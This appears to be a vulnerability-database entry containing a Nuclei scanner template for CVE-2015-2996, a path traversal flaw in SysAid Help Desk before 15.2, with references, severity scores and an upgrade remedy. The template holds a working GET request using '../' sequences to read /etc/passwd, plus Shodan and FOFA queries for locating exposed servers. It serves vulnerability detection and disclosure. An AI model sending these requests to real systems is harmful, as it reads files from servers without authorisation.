SysAid Help Desk <15.2 - Local File Inclusion

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType

SysAid Help Desk <15.2 - Local File Inclusion vulnerability allows remote attackers to read sensitive files via the fileName parameter in getGfiUpgradeFile and calculateRdsFileChecksum, with high severity

Reporter	Title	Published	Views	Family All 16
0day.today	SysAid Help Desk 14.4 Multiple Vulnerabilities	4 Jun 201500:00	–	zdt
Circl	CVE-2015-2996	29 May 201815:50	–	circl
CNVD	SysAid Help Desk Directory Traversal Vulnerability	9 Jun 201500:00	–	cnvd
CVE	CVE-2015-2996	8 Jun 201514:00	–	cve
Cvelist	CVE-2015-2996	8 Jun 201514:00	–	cvelist
Exploit DB	SysAid Help Desk 14.4 - Multiple Vulnerabilities	10 Jun 201500:00	–	exploitdb
exploitpack	SysAid Help Desk 14.4 - Multiple Vulnerabilities	10 Jun 201500:00	–	exploitpack
Metasploit	SysAid Help Desk Arbitrary File Download	3 Jun 201520:59	–	metasploit
Metasploit	SysAid Help Desk Database Credentials Disclosure	3 Jun 201520:46	–	metasploit
NVD	CVE-2015-2996	8 Jun 201514:59	–	nvd

Source	Link
seclists	www.seclists.org/fulldisclosure/2015/Jun/8
sysaid	www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
seclists	www.seclists.org/fulldisclosure/2015/Jun/8
nvd	www.nvd.nist.gov/vuln/detail/CVE-2015-2996
github	www.github.com/ARPSyndicate/kenzer-templates

id: CVE-2015-2996

info:
  name: SysAid Help Desk <15.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2015/Jun/8
    - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
    - http://seclists.org/fulldisclosure/2015/Jun/8
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2996
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
    cvss-score: 8.5
    cve-id: CVE-2015-2996
    cwe-id: CWE-22
    epss-score: 0.86643
    epss-percentile: 0.99713
    cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:1540720428
    fofa-query: icon_hash=1540720428
  tags: cve2015,cve,sysaid,lfi,seclists,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
      - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220287920c516e3d0f9689b6358b66462553498e48fa6fc0cd8fbee41f06f4e7886022100801882ba7566a410e89cdd4d2cd2f04f8601c2db0993fb83b467f2f7eadabc9b:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

5.5Medium risk

Vulners AI Score5.5

CVSS 28.5

EPSS0.86643